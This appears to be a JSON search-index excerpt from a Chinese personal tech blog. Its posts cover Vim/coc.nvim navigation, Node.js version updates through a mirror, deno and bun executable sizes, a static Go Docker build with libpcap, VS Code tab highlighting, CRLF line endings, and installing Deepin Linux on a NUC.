Greasemonkey,简称GM,中文俗称为“油猴”,是Firefox的一个附加组件。它让用户安装一些脚本使大部分HTML为主的网页于用户端直接改变得更方便易用。随着Greasemonkey脚本常驻于浏览器,每次随着目的网页打开而自动做修改,使得运行脚本的用户印象深刻地享受其固定便利性。\nGreasemonkey可替网页加入些新功能(例如在亚马逊书店嵌入商品比价功能)、修正网页错误、组合来自不同网页的数据、或者数繁不及备载的其他功能。写的好的Greasemonkey脚本甚至可让其输出与被修改的页面集成得天衣无缝,像是原本网页里的一部分。 来自维基百科\n2. 如何安装油猴子插件? 在google商店搜索Tampermonkey, 安装量最高的就是它。\n3. 如何写油猴子脚本? 油猴子脚本有个新建脚本页面,在此页面可以创建脚本。具体教程可以参考。\n中文 GreaseMonkey 用户脚本开发手册 GreaseMonkey(油猴子)脚本开发 深入浅出 Greasemonkey Greasemonkey Hacks/Getting Started 4. 如何使用他人的脚本? greasyfork网站提供很多脚本,它仿佛是代码界的github, 可以在该网站搜到很多有意思的脚本。\n5. 有哪些好用的脚本? 有哪些超神的油猴脚本?\n或者你可以在greasyfork网站查看一些下载量排行\n","permalink":"https://wdd.js.org/posts/2018/01/tampermonkey/","summary":"当你用浏览器访问某个网页时,你可曾想过,你看到的这个网页,实际上是属于你自己的。\n打个比喻:访问某个网站就好像是网购了一筐鸡蛋,鸡蛋虽然是养鸡场生产的,但是这个蛋我怎么吃,你养鸡场管不着。\n当然了,对于很多人来说,鸡蛋没有别的吃法,鸡蛋只能煮着吃。\n你可以看如下的页面:当你在某搜索引擎上搜索前端开发时\n大多数人看到的页面是这样的, 满屏的广告,满屏的推广,满屏的排名,满屏的中间地址跳转,满屏的流量劫持, 还有莆田系\n但是有些人的页面却是这样的:清晰,自然,链接直达,清水出芙蓉,天然去雕饰 这就是油猴子脚本干的事情, 当然,它能干的事情,远不止如此。它是齐天大圣孙悟空,有七十二变。\n1. 什么是油猴子脚本? Greasemonkey,简称GM,中文俗称为“油猴”,是Firefox的一个附加组件。它让用户安装一些脚本使大部分HTML为主的网页于用户端直接改变得更方便易用。随着Greasemonkey脚本常驻于浏览器,每次随着目的网页打开而自动做修改,使得运行脚本的用户印象深刻地享受其固定便利性。\nGreasemonkey可替网页加入些新功能(例如在亚马逊书店嵌入商品比价功能)、修正网页错误、组合来自不同网页的数据、或者数繁不及备载的其他功能。写的好的Greasemonkey脚本甚至可让其输出与被修改的页面集成得天衣无缝,像是原本网页里的一部分。 来自维基百科\n2. 如何安装油猴子插件? 在google商店搜索Tampermonkey, 安装量最高的就是它。\n3. 如何写油猴子脚本? 油猴子脚本有个新建脚本页面,在此页面可以创建脚本。具体教程可以参考。\n中文 GreaseMonkey 用户脚本开发手册 GreaseMonkey(油猴子)脚本开发 深入浅出 Greasemonkey Greasemonkey Hacks/Getting Started 4. 如何使用他人的脚本? greasyfork网站提供很多脚本,它仿佛是代码界的github, 可以在该网站搜到很多有意思的脚本。\n5. 有哪些好用的脚本? 有哪些超神的油猴脚本?\n或者你可以在greasyfork网站查看一些下载量排行","title":"油猴子脚本 - 我的地盘我做主"},{"content":" 引子: 很多时候,当我要字符串截取时,我会想到substr和substring的方法,但是具体要怎么传参数时,我总是记不住。哪个应该传个字符串长度,哪个又应该传个开始和结尾的下标,如果我不去查查这两个函数,我始终不敢去使用它们。所以我总是觉得,这个两个方法名起的真是蹩脚。然而事实是这样的吗?\n看来是时候扒一扒这两个方法的历史了。\n1. 基因追本溯源 在编程语言的历史长河中,曾经出现过很多编程语言。然而大浪淘沙,铅华洗尽之后,很多早已折戟沉沙,有些却依旧光彩夺目。那么stubstr与substring的DNA究竟来自何处?\n1950与1960年代\n1954 - FORTRAN 1958 - LISP 1959 - COBOL 1964 - BASIC 1970 - Pascal 1967-1978:确立了基础范式\n1972 - C语言 1975 - Scheme 1978 - SQL (起先只是一种查询语言,扩充之后也具备了程序结构) 1980年代:增强、模块、性能\n1983 - C++ (就像有类别的C) 1988 - Tcl 1990年代:互联网时代\n1991 - Python 1991 - Visual Basic 1993 - Ruby 1995 - Java 1995 - Delphi (Object Pascal) 1995 - JavaScript 1995 - PHP 2009 - Go 2014 - Swift (编程语言) 1.1. 在C++中首次出现substr() 在c语言中,并没有出现substr或者substring方法。然而在1983,substr()方法已经出现在C++语言中了。然而这时候还没有出现substring, 所以可以见得:substr是stustring的老大哥\nstring substr (size_t pos = 0, size_t len = npos) const; 从C++的方法定义中可以看到, substr的参数是开始下标,以及字符串长度。\nstd::string str=\u0026#34;We think in generalities, but we live in details.\u0026#34;; std::string str2 = str.substr (3,5); // \u0026#34;think\u0026#34; 1.2. 在Java中首次出现substring() 距离substr()方法出现已经有了将近十年之隔,此间涌现一批后起之秀,如: Python, Ruby, VB之类,然而他们之中并没有stustring的基因,在Java的String类中,我们看到两个方法。从这两个方法之中我们可以看到:substring方法基本原型的参数是开始和结束的下标。\nString substring(int beginIndex) // 返回一个新的字符串,它是此字符串的一个子字符串。 String substring(int beginIndex, int endIndex) // 返回一个新字符串,它是此字符串的一个子字符串。 2. JavaScript的历史继承 1995年,网景公司招募了Brendan Eich,目的是将Scheme编程语言嵌入到Netscape Navigator中。在开始之前,Netscape Communications与Sun Microsystems公司合作,在Netscape Navigator中引入了更多的静态编程语言Java,以便与微软竞争用户采用Web技术和平台。网景公司决定,他们想创建的脚本语言将补充Java,并且应该有一个类似的语法,排除采用Perl,Python,TCL或Scheme等其他语言。为了捍卫对竞争性提案的JavaScript的想法,公司需要一个原型。 1995年5月,Eich在10天内写完。\n上帝用七天时间创造万物, Brendan Eich用10天时间创造了一门语言。或许用创造并不合适,因为JavaScript是站在了Perl,Python,TCL或Scheme等其他巨人的肩膀上而产生的。\nJavaScript并不像C那样出身名门,在贝尔实验室精心打造,但是JavaScript在往后的自然选择中,并没有因此萧条,反而借助于C,C++, Java, Perl,Python,TCL, Scheme优秀基因,进化出更加强大强大的生命力。\n因此可以想象,在10天之内,当Brendan Eich写到String的substr和substring方法时,或许他并没困惑着两个方法的参数应该如何设置,因为在C++和Java的实现中,已经有了类似的定义。 如果你了解历史,你就不会困惑现在。\n3. 所以,substr和substring究竟有什么不同? 如下图所示:substr和substring都接受两个参数,他们的第一个参数的含义是相同的,不同的是第二个参数。substr的第二个参数是到达结束点的距离,substring是结束的位置。\n4. 参考文献 维基百科:程式語言歷史 C++ std::string::substr JavaScript 如有不正确的地方,欢迎指正。\n","permalink":"https://wdd.js.org/posts/2018/01/substr-and-substring-history/","summary":"引子: 很多时候,当我要字符串截取时,我会想到substr和substring的方法,但是具体要怎么传参数时,我总是记不住。哪个应该传个字符串长度,哪个又应该传个开始和结尾的下标,如果我不去查查这两个函数,我始终不敢去使用它们。所以我总是觉得,这个两个方法名起的真是蹩脚。然而事实是这样的吗?\n看来是时候扒一扒这两个方法的历史了。\n1. 基因追本溯源 在编程语言的历史长河中,曾经出现过很多编程语言。然而大浪淘沙,铅华洗尽之后,很多早已折戟沉沙,有些却依旧光彩夺目。那么stubstr与substring的DNA究竟来自何处?\n1950与1960年代\n1954 - FORTRAN 1958 - LISP 1959 - COBOL 1964 - BASIC 1970 - Pascal 1967-1978:确立了基础范式\n1972 - C语言 1975 - Scheme 1978 - SQL (起先只是一种查询语言,扩充之后也具备了程序结构) 1980年代:增强、模块、性能\n1983 - C++ (就像有类别的C) 1988 - Tcl 1990年代:互联网时代\n1991 - Python 1991 - Visual Basic 1993 - Ruby 1995 - Java 1995 - Delphi (Object Pascal) 1995 - JavaScript 1995 - PHP 2009 - Go 2014 - Swift (编程语言) 1.","title":"追本溯源:substr与substring历史漫话"},{"content":"1. 情景再现 以前用nodejs写后端程序时,遇到Promise这个概念,这个东西好呀!不用谢一层一层回调,直接用类似于jQuery的连缀方式。后来遇到bluebird这个库,它就是Promise库中很有名的。我希望可以把Promise用在前端的ajax请求上,但是我不想又引入bluebird。后来发现,jquery本身就具有类似于Promise的东西。于是我就jquery的Promise写一些异步请求。\n2. 不堪回首 看看一看我以前写异步请求的方式\n// 函数定义 function sendRequest(req,successCallback,errorCallback){ $.ajax({ ... ... success:function(res){ successCallback(res); }, error:function(res){ errorCallback(res); } }); } // 函数调用,这个函数的匿名函数写的时候很容易出错,而且有时候难以理解 sendRequest(req,function(res){ //请求成功 ... },function(res){ //请求失败 ... }); 3. 面朝大海 下面是我希望的异步调用方式\nsendRequest(req) .done(function(res){ //请求成功 ... }) .fail(function(req){ //请求失败 ... }); 4. 废话少说,放‘码’过来 talk is cheap, show me the code\n// 最底层的发送异步请求,做成Promise的形式 App.addMethod(\u0026#39;_sendRequest\u0026#39;,function(path,method,payload){ var dfd = $.Deferred(); $.ajax({ url:path, type:method || \u0026#34;get\u0026#34;, headers:{ sessionId:session.id || \u0026#39;\u0026#39; }, data:JSON.stringify(payload), dataType:\u0026#34;json\u0026#34;, contentType : \u0026#39;application/json; charset=UTF-8\u0026#39;, success:function(data){ dfd.resolve(data); }, error:function(data){ dfd.reject(data); } }); return dfd.promise(); }); //根据callId查询录音文件,不仅仅是异步请求可以做成Promise形式,任何函数都可以做成Promise形式 App.addMethod(\u0026#39;_getRecordingsByCallId\u0026#39;,function(callId){ var dfd = $.Deferred(), path = \u0026#39;/api/tenantcalls/\u0026#39;+callId+\u0026#39;/recordings\u0026#39;; App._sendRequest(path) .done(function(res){dfd.resolve(res);}) .fail(function(res){dfd.reject(res);}); return dfd.promise(); }); // 获取录音 App.addMethod(\u0026#39;getCallDetailRecordings\u0026#39;,function(callId){ App._getRecordingsByCallId(callId) .done(function(res){ // 获取结果后渲染数据 App.renderRecording(res); }) .fail(function(res){ App.error(res); }); }); 5. 注意事项 jQuery的Promise主要是用了jQquery的$.Derferred()方法,一些老版本的jquery并不支持此方法。 jQuery版本必须大于等于1.5,推荐使用1.11.3 6. 参考文献 jquery官方api文档 jquery维基百科文档 7. 最后 以上文章仅供参考,不包完全正确。欢迎评论,3q。\n","permalink":"https://wdd.js.org/posts/2018/01/jquery-deferred/","summary":"1. 情景再现 以前用nodejs写后端程序时,遇到Promise这个概念,这个东西好呀!不用谢一层一层回调,直接用类似于jQuery的连缀方式。后来遇到bluebird这个库,它就是Promise库中很有名的。我希望可以把Promise用在前端的ajax请求上,但是我不想又引入bluebird。后来发现,jquery本身就具有类似于Promise的东西。于是我就jquery的Promise写一些异步请求。\n2. 不堪回首 看看一看我以前写异步请求的方式\n// 函数定义 function sendRequest(req,successCallback,errorCallback){ $.ajax({ ... ... success:function(res){ successCallback(res); }, error:function(res){ errorCallback(res); } }); } // 函数调用,这个函数的匿名函数写的时候很容易出错,而且有时候难以理解 sendRequest(req,function(res){ //请求成功 ... },function(res){ //请求失败 ... }); 3. 面朝大海 下面是我希望的异步调用方式\nsendRequest(req) .done(function(res){ //请求成功 ... }) .fail(function(req){ //请求失败 ... }); 4. 废话少说,放‘码’过来 talk is cheap, show me the code\n// 最底层的发送异步请求,做成Promise的形式 App.addMethod(\u0026#39;_sendRequest\u0026#39;,function(path,method,payload){ var dfd = $.Deferred(); $.ajax({ url:path, type:method || \u0026#34;get\u0026#34;, headers:{ sessionId:session.id || \u0026#39;\u0026#39; }, data:JSON.stringify(payload), dataType:\u0026#34;json\u0026#34;, contentType : \u0026#39;application/json; charset=UTF-8\u0026#39;, success:function(data){ dfd.","title":"熟练使用使用jQuery Promise (Deferred)"}] \ No newline at end of file +[{"content":"请注意,VIM的光标现在位于错误弹窗上了。光标只能左右移动,无法上线移动。 我的光标被困在了错误提示框中。\n因为错误提示只有一行,所以无法上下移动。\n一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。\n正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。\n我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。\n能解决困难,则学到东西。\n否则就只能放弃VIM, 回到VScode的怀抱中。\n但是,我已经习惯了不使用鼠标的快捷编辑方式。\n我只能学会解决并适应VIM, 并且接受VIM的所有挑战。\n","permalink":"https://wdd.js.org/vim/stuck-in-error-msgfloat-window/","summary":"请注意,VIM的光标现在位于错误弹窗上了。光标只能左右移动,无法上线移动。 我的光标被困在了错误提示框中。\n因为错误提示只有一行,所以无法上下移动。\n一直以来,我并没有把错误提示框也看成一个窗口,所以我可能多次按了ctrl + w w, 然后光标跳转到了错误提示框上。\n正常的错误提示框,当光标不在关键词上时,错误弹窗会自动关闭的。 但是由于我已经进入了错误弹窗里面。 所以除非按窗口切换的快捷键,我会始终困在这个错误窗口中。\n我觉得,VIM实在是太博大精深了。很多概念性的理解不到位,就会越到很多困难。 这些困难会给人造成极大的挫折感。\n能解决困难,则学到东西。\n否则就只能放弃VIM, 回到VScode的怀抱中。\n但是,我已经习惯了不使用鼠标的快捷编辑方式。\n我只能学会解决并适应VIM, 并且接受VIM的所有挑战。","title":"困在coc错误弹窗中"},{"content":"在VScode中,可以使用右键来跳转到typescript类型对应的定义,但是用vim的gd命令却无法正常跳转。\n因为无法正常跳转的这个问题,我差点放弃了vim。\n然而我想别人应该也遇到类似的问题。\n我的neovim本身使用的是coc插件,然后我就再次到看看官方文档,来确定最终有没有解决这个问题的方案。\n功夫不负有心人。\n我发现官方给的例子中,就包括了如何配置跳换的配置。\n首先说明一下,我本身就安装了coc-json coc-tsserver这两个插件,所以只需要将如下的配置写入init.vim\n\u0026#34; GoTo code navigation nmap \u0026lt;silent\u0026gt; gd \u0026lt;Plug\u0026gt;(coc-definition) nmap \u0026lt;silent\u0026gt; gy \u0026lt;Plug\u0026gt;(coc-type-definition) nmap \u0026lt;silent\u0026gt; gi \u0026lt;Plug\u0026gt;(coc-implementation) nmap \u0026lt;silent\u0026gt; gr \u0026lt;Plug\u0026gt;(coc-references) 这样的话,在普通模式,按gy这个快捷键,就能跳转到对应的类型定义,包括某个npm包的里面的类型定义,非常好用。\n亲测有效。\n","permalink":"https://wdd.js.org/vim/typescript-go-to-definition/","summary":"在VScode中,可以使用右键来跳转到typescript类型对应的定义,但是用vim的gd命令却无法正常跳转。\n因为无法正常跳转的这个问题,我差点放弃了vim。\n然而我想别人应该也遇到类似的问题。\n我的neovim本身使用的是coc插件,然后我就再次到看看官方文档,来确定最终有没有解决这个问题的方案。\n功夫不负有心人。\n我发现官方给的例子中,就包括了如何配置跳换的配置。\n首先说明一下,我本身就安装了coc-json coc-tsserver这两个插件,所以只需要将如下的配置写入init.vim\n\u0026#34; GoTo code navigation nmap \u0026lt;silent\u0026gt; gd \u0026lt;Plug\u0026gt;(coc-definition) nmap \u0026lt;silent\u0026gt; gy \u0026lt;Plug\u0026gt;(coc-type-definition) nmap \u0026lt;silent\u0026gt; gi \u0026lt;Plug\u0026gt;(coc-implementation) nmap \u0026lt;silent\u0026gt; gr \u0026lt;Plug\u0026gt;(coc-references) 这样的话,在普通模式,按gy这个快捷键,就能跳转到对应的类型定义,包括某个npm包的里面的类型定义,非常好用。\n亲测有效。","title":"VIM typescript 跳转到定义"},{"content":"我一般会紧跟着NodeJS官网的最新版,来更新本地的NodeJS版本。\n我的系统是ubuntu 20.4, 我用tj/n这个工具来更新Node。\n但是这一次,这个命令似乎卡住了。\n我排查后发现,是n这个命令在访问https://nodejs.org/dist/index.tab这个地址时,卡住了。\n请求超时,因为默认没有设置超时时长,所以等待了很久才显示超时的报错,表现象上看起来就是卡住了。\n首先我用dig命令查了nodejs.org的dns解析,我发现是正常解析的。\n然后我又用curl对nodejs官网做了一个测试,发现也是请求超时。\ncurl -i -m 5 https://nodejs.org curl: (28) Failed to connect to nodejs.org port 443 after 3854 ms: 连接超时 这样问题就清楚了,然后我就想起来npmirrror上应该有nodejs的镜像。 在查看n这个工具的文档时,我也发现,它是支持设置mirror的。\n其中给的例子用的就是淘宝NPM\n就是设置了一个环境变量。然后执行source ~/.zshrc\nexport N_NODE_MIRROR=https://npmmirror.com/mirrors/node 但是,我发现在命令行里用echo可以打印N_NODE_MIRROR这个变量的值,但是在安装脚本里,还是无法获取设置的这个mirror。\n我想或许和我在执行sudo n lts时的sudo有关,这个.zshrc在sudo这种管理员模式下是不生效的。普通用户的环境变量也不会继承到sudo执行的环境变量里\n最后,我用sudo -E n lts, 成功的从npmmirror上更新了nodejs的版本。\n关于curl超时的这个问题,我也给n仓库提出了pull request, https://github.com/tj/n/pull/771\n","permalink":"https://wdd.js.org/posts/2023/n-stucked/","summary":"我一般会紧跟着NodeJS官网的最新版,来更新本地的NodeJS版本。\n我的系统是ubuntu 20.4, 我用tj/n这个工具来更新Node。\n但是这一次,这个命令似乎卡住了。\n我排查后发现,是n这个命令在访问https://nodejs.org/dist/index.tab这个地址时,卡住了。\n请求超时,因为默认没有设置超时时长,所以等待了很久才显示超时的报错,表现象上看起来就是卡住了。\n首先我用dig命令查了nodejs.org的dns解析,我发现是正常解析的。\n然后我又用curl对nodejs官网做了一个测试,发现也是请求超时。\ncurl -i -m 5 https://nodejs.org curl: (28) Failed to connect to nodejs.org port 443 after 3854 ms: 连接超时 这样问题就清楚了,然后我就想起来npmirrror上应该有nodejs的镜像。 在查看n这个工具的文档时,我也发现,它是支持设置mirror的。\n其中给的例子用的就是淘宝NPM\n就是设置了一个环境变量。然后执行source ~/.zshrc\nexport N_NODE_MIRROR=https://npmmirror.com/mirrors/node 但是,我发现在命令行里用echo可以打印N_NODE_MIRROR这个变量的值,但是在安装脚本里,还是无法获取设置的这个mirror。\n我想或许和我在执行sudo n lts时的sudo有关,这个.zshrc在sudo这种管理员模式下是不生效的。普通用户的环境变量也不会继承到sudo执行的环境变量里\n最后,我用sudo -E n lts, 成功的从npmmirror上更新了nodejs的版本。\n关于curl超时的这个问题,我也给n仓库提出了pull request, https://github.com/tj/n/pull/771","title":"安装NodeJS, N命令似乎卡住了"},{"content":"很早以前,要运行js,则必须安装nodejs,且没什么办法可以把js直接构建成一个可执行的文件。\n后来出现一个pkg的npm包,可以用来将js打包成可执行的文件。\n我好像用过这个包,但是似乎中间出过一些问题。\n现在是2023年,前端有了新的气象。\n除了nodejs外,还有其他的后来新秀,如deno, 还有最近表火的bun\n另外nodejs本身也开始支持打包独立二进制文件了,但是需要最新的20.x版本,而且我看了它的使用介绍文档,single-executable-applications, 看起来是有有点复杂,光一个构建就写了七八步。\n所以今天只比较一些deno和bun的构建出的文件大小。\n准备的js文件内容\n// app.js console.log(\u0026#34;hello world\u0026#34;) deno构建指令: deno compile --output h1 app.js, 构建产物为h1 bun构建指令: bun build ./app.js --compile --outfile h2, 构建产物为h2\n-rw-r--r--@ 1 wangduanduan staff 26B Jun 1 13:34 app.js -rwxrwxrwx@ 1 wangduanduan staff 78M Jun 1 13:59 h1 -rwxrwxrwx@ 1 wangduanduan staff 45M Jun 1 14:01 h2 源代码为26b字节\ndeno构建相比于源码的倍数: 3152838 bun构建相比于源码的翻倍: 1804415 deno构建的可执行文件相比bun翻倍:1.7 参考 https://bun.sh/docs/bundler/executables https://deno.com/manual@v1.34.1/tools/compiler https://nodejs.org/api/single-executable-applications.html ","permalink":"https://wdd.js.org/posts/2023/js-runtime-build-executable/","summary":"很早以前,要运行js,则必须安装nodejs,且没什么办法可以把js直接构建成一个可执行的文件。\n后来出现一个pkg的npm包,可以用来将js打包成可执行的文件。\n我好像用过这个包,但是似乎中间出过一些问题。\n现在是2023年,前端有了新的气象。\n除了nodejs外,还有其他的后来新秀,如deno, 还有最近表火的bun\n另外nodejs本身也开始支持打包独立二进制文件了,但是需要最新的20.x版本,而且我看了它的使用介绍文档,single-executable-applications, 看起来是有有点复杂,光一个构建就写了七八步。\n所以今天只比较一些deno和bun的构建出的文件大小。\n准备的js文件内容\n// app.js console.log(\u0026#34;hello world\u0026#34;) deno构建指令: deno compile --output h1 app.js, 构建产物为h1 bun构建指令: bun build ./app.js --compile --outfile h2, 构建产物为h2\n-rw-r--r--@ 1 wangduanduan staff 26B Jun 1 13:34 app.js -rwxrwxrwx@ 1 wangduanduan staff 78M Jun 1 13:59 h1 -rwxrwxrwx@ 1 wangduanduan staff 45M Jun 1 14:01 h2 源代码为26b字节\ndeno构建相比于源码的倍数: 3152838 bun构建相比于源码的翻倍: 1804415 deno构建的可执行文件相比bun翻倍:1.7 参考 https://bun.sh/docs/bundler/executables https://deno.com/manual@v1.34.1/tools/compiler https://nodejs.org/api/single-executable-applications.html ","title":"JS运行时构建独立二进制程序比较"},{"content":"常规构建 一般情况下,我们的Dockerfile可能是下面这样的\n这个Dockerfile使用了多步构建,使用golang:1.19.4作为构建容器,二进制文件构建成功后,单独把文件复制到alpine镜像。 这样做的好处是最后产出的镜像非常小,一般只有十几MB的样子,如果直接使用golang的镜像来构建,镜像体积就可能达到1G左右。 FROM golang:1.19.4 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o run . FROM alpine:3.14.2 WORKDIR /app COPY encdec run.sh /app/ COPY --from=builder /app/run . EXPOSE 3000 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 依赖libpcap的构建 如果使用了程序使用了libpcap 来抓包,那么除了我们自己代码产生的二进制文件外,可能还会依赖libpcap的文件。常规打包就会报各种错误,例如文件找不到,缺少so文件等等。\nlibpcap是一个c库,并不是golang的代码,所以处理起来要不一样。\n下面直接给出Dockerfile\n# 构建的基础镜像换成了alpine镜像 FROM golang:alpine as builder # 将alpine镜像换清华源,这样后续依赖的安装会加快 RUN sed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories # 安装需要用到的C库,和构建依赖 RUN apk --update add linux-headers musl-dev gcc libpcap-dev # 使用国内的goproxy ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct # 设置工作目录 WORKDIR /app # 拷贝go相关的依赖 COPY go.mod go.sum ./ # 下载go相关的依赖 RUN go mod download # 复制go代码 COPY . . # 编译go代码 RUN CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build -a --ldflags \u0026#39;-linkmode external -extldflags \u0026#34;-static -s -w\u0026#34;\u0026#39; -o run main.go # 使用最小的scratch镜像 FROM scratch # 设置工作目录 WORKDIR /app # 拷贝二进制文件 COPY --from=builder /app/run . EXPOSE 8086 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 整个Dockerfile比较好理解,重要的部分就是ldflags的参数了,下面着重讲解一下\n--ldflags \u0026#39;-linkmode external -extldflags \u0026#34;-static -s -w\u0026#34;\u0026#39; 这个 go build 命令包含以下参数:\n-a:强制重新编译所有的包,即使它们已经是最新的。这个选项通常用于强制更新依赖包或者重建整个程序。 --ldflags:设置链接器选项,这个选项后面的参数会被传递给链接器。 -linkmode external:指定链接模式为 external,即使用外部链接器。 -extldflags \u0026quot;-static -s -w\u0026quot;:传递给外部链接器的选项,其中包含了 -static(强制使用静态链接)、-s(禁止符号表和调试信息生成)和 -w(禁止 DWARF 调试信息生成)三个选项。 这个命令的目的是生成一个静态链接的可执行文件,其中所有的依赖包都被链接进了最终的二进制文件中,这样可以保证可执行文件的可移植性和兼容性,同时也可以减小文件大小。这个命令的缺点是编译时间较长,特别是在包数量较多的情况下,因为它需要重新编译所有的包,即使它们已经是最新的。\n","permalink":"https://wdd.js.org/golang/build-docker-image-with-libpcap/","summary":"常规构建 一般情况下,我们的Dockerfile可能是下面这样的\n这个Dockerfile使用了多步构建,使用golang:1.19.4作为构建容器,二进制文件构建成功后,单独把文件复制到alpine镜像。 这样做的好处是最后产出的镜像非常小,一般只有十几MB的样子,如果直接使用golang的镜像来构建,镜像体积就可能达到1G左右。 FROM golang:1.19.4 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o run . FROM alpine:3.14.2 WORKDIR /app COPY encdec run.sh /app/ COPY --from=builder /app/run . EXPOSE 3000 ENTRYPOINT [\u0026#34;/app/run\u0026#34;] 依赖libpcap的构建 如果使用了程序使用了libpcap 来抓包,那么除了我们自己代码产生的二进制文件外,可能还会依赖libpcap的文件。常规打包就会报各种错误,例如文件找不到,缺少so文件等等。\nlibpcap是一个c库,并不是golang的代码,所以处理起来要不一样。\n下面直接给出Dockerfile\n# 构建的基础镜像换成了alpine镜像 FROM golang:alpine as builder # 将alpine镜像换清华源,这样后续依赖的安装会加快 RUN sed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories # 安装需要用到的C库,和构建依赖 RUN apk --update add linux-headers musl-dev gcc libpcap-dev # 使用国内的goproxy ENV GO111MODULE=on GOPROXY=https://goproxy.","title":"Build Docker Image With Libpcap"},{"content":"默认情况下VScode的tab栏,当前的颜色会更深一点。如下图所示,第三个就是激活的。\n但是实际上并没有太高的区分度,特别是当显示屏有点反光的时候。\n我想应该不止一个人有这个问题吧\n看了github上,有个人反馈了这个问题,https://github.com/Microsoft/vscode/issues/24586\n后面有人回复了\n\u0026#34;workbench.colorCustomizations\u0026#34;: { \u0026#34;tab.activeBorder\u0026#34;: \u0026#34;#ff0000\u0026#34;, \u0026#34;tab.unfocusedActiveBorder\u0026#34;: \u0026#34;#000000\u0026#34; } 上面就是用来配置Tab边界的颜色的。\n看下效果,当前激活的Tab下有明显的红线,是不是更容易区分了呢\n","permalink":"https://wdd.js.org/posts/2023/vscode-highlight-tab/","summary":"默认情况下VScode的tab栏,当前的颜色会更深一点。如下图所示,第三个就是激活的。\n但是实际上并没有太高的区分度,特别是当显示屏有点反光的时候。\n我想应该不止一个人有这个问题吧\n看了github上,有个人反馈了这个问题,https://github.com/Microsoft/vscode/issues/24586\n后面有人回复了\n\u0026#34;workbench.colorCustomizations\u0026#34;: { \u0026#34;tab.activeBorder\u0026#34;: \u0026#34;#ff0000\u0026#34;, \u0026#34;tab.unfocusedActiveBorder\u0026#34;: \u0026#34;#000000\u0026#34; } 上面就是用来配置Tab边界的颜色的。\n看下效果,当前激活的Tab下有明显的红线,是不是更容易区分了呢","title":"VScode激活Tab更容易区分"},{"content":"CRLF 二进制 十进制 十六进制 八进制 字符/缩写 解释 00001010 10 0A 012 LF/NL(Line Feed/New Line) 换行键 00001101 13 0D 085 CR (Carriage Return) 回车键 CR代表回车符,LF代表换行符。\n这两个符号本身都是不可见的。\n如果打印出来\nCR 会显示 \\r LF 会显示 \\n 不同系统的行结束符 Linux系统和Mac换行符是 \\n Windows系统的换行符是 \\r\\n 如何区分文件的换行符? 可以使用od命令\nod -bc index.md 假如文件的原始内容如下\n- 1 - 2 注意012是八进制的数,十进制对应的数字是10,也就是换行符。\n0000000 055 040 061 012 055 040 062 - 1 \\n - 2 0000007 如果用vscode打开文件,也能看到对应的文件格式,如LF。\n换行符的的差异会导致哪些问题? shell脚本问题 如果bash脚本里包含CRLF, 可能导致脚本无法解析等各种异常问题。\n例如下面的报错,docker启动shell脚本可能是在windows下编写的。所以脚本无法\nstandard_init_linux.go:211: exec user process caused \u0026#34;no such file or directory\u0026#34; 如何把windows文件类型转为unix? # 可以把windows文件类型转为unix dos2unix file 如果是vscode,也可以点击对应的文件格式按钮。\n如何解决这些问题? 最好的方案,是我们把代码编辑器, 设置eol为\\n, 从源头解决这个问题。\n以vscode为例子:\nTip vscode的eol配置,只对新文件生效 如果文件本来就是CRLF, 需要先转成LF, eol才会生效 ","permalink":"https://wdd.js.org/posts/2023/tips-about-cr-lf/","summary":"CRLF 二进制 十进制 十六进制 八进制 字符/缩写 解释 00001010 10 0A 012 LF/NL(Line Feed/New Line) 换行键 00001101 13 0D 085 CR (Carriage Return) 回车键 CR代表回车符,LF代表换行符。\n这两个符号本身都是不可见的。\n如果打印出来\nCR 会显示 \\r LF 会显示 \\n 不同系统的行结束符 Linux系统和Mac换行符是 \\n Windows系统的换行符是 \\r\\n 如何区分文件的换行符? 可以使用od命令\nod -bc index.md 假如文件的原始内容如下\n- 1 - 2 注意012是八进制的数,十进制对应的数字是10,也就是换行符。\n0000000 055 040 061 012 055 040 062 - 1 \\n - 2 0000007 如果用vscode打开文件,也能看到对应的文件格式,如LF。\n换行符的的差异会导致哪些问题? shell脚本问题 如果bash脚本里包含CRLF, 可能导致脚本无法解析等各种异常问题。\n例如下面的报错,docker启动shell脚本可能是在windows下编写的。所以脚本无法\nstandard_init_linux.go:211: exec user process caused \u0026#34;no such file or directory\u0026#34; 如何把windows文件类型转为unix?","title":"行位结束符引起的问题"},{"content":"硬件 内存:金士顿 16*2;869元 固态硬盘: 三星980 1TB; 799元 主机:NUC11 PAHI7; 4核心八线程;3399元 累计5000多一点, 是最新版Macbook pro M1prod的三分之一\n启动盘制作 ventoy:试了几次,无法开机,遂放弃 rufus:能够正常使用;注意分区类型要选择GPT。最新款的一些电脑都是支持uefi的,所以选择GPT分区,一定没问题。\nU盘启动 开机后按F2, 里面有一个是设置BIOS优先级,可以设置优先U盘启动\n磁盘分区 因为之前设置了默认的整个磁盘分区,根目录只有15G, 太小了,所以我选择手动分区 先设置一个efi分区,就用默认的300M就可以,默认弹窗出来,是不需要设置挂在目录的 设置根分区 /, 我分了300G 设置/home分区,剩下的磁盘都分给他 我没有设置swap分区,因为我觉得32G内存够大,不需要swap\n其他 后续的配置非常简单,基本点点按钮就能搞定\n体验 总体来说,安装软件是最舒服的一件事。不需要像安装manjaro那样,到处找安装常用应用的教程。只需要打开应用商店,点击下载就可以了。 整个安装过程,我觉得磁盘分区是最难的部分。其他都是非常方便的。 感觉深度的界面很漂亮,值得体验\n问题 NUC自带的麦克风无法外放声音,插有线耳机也不行,只有蓝牙耳机能用 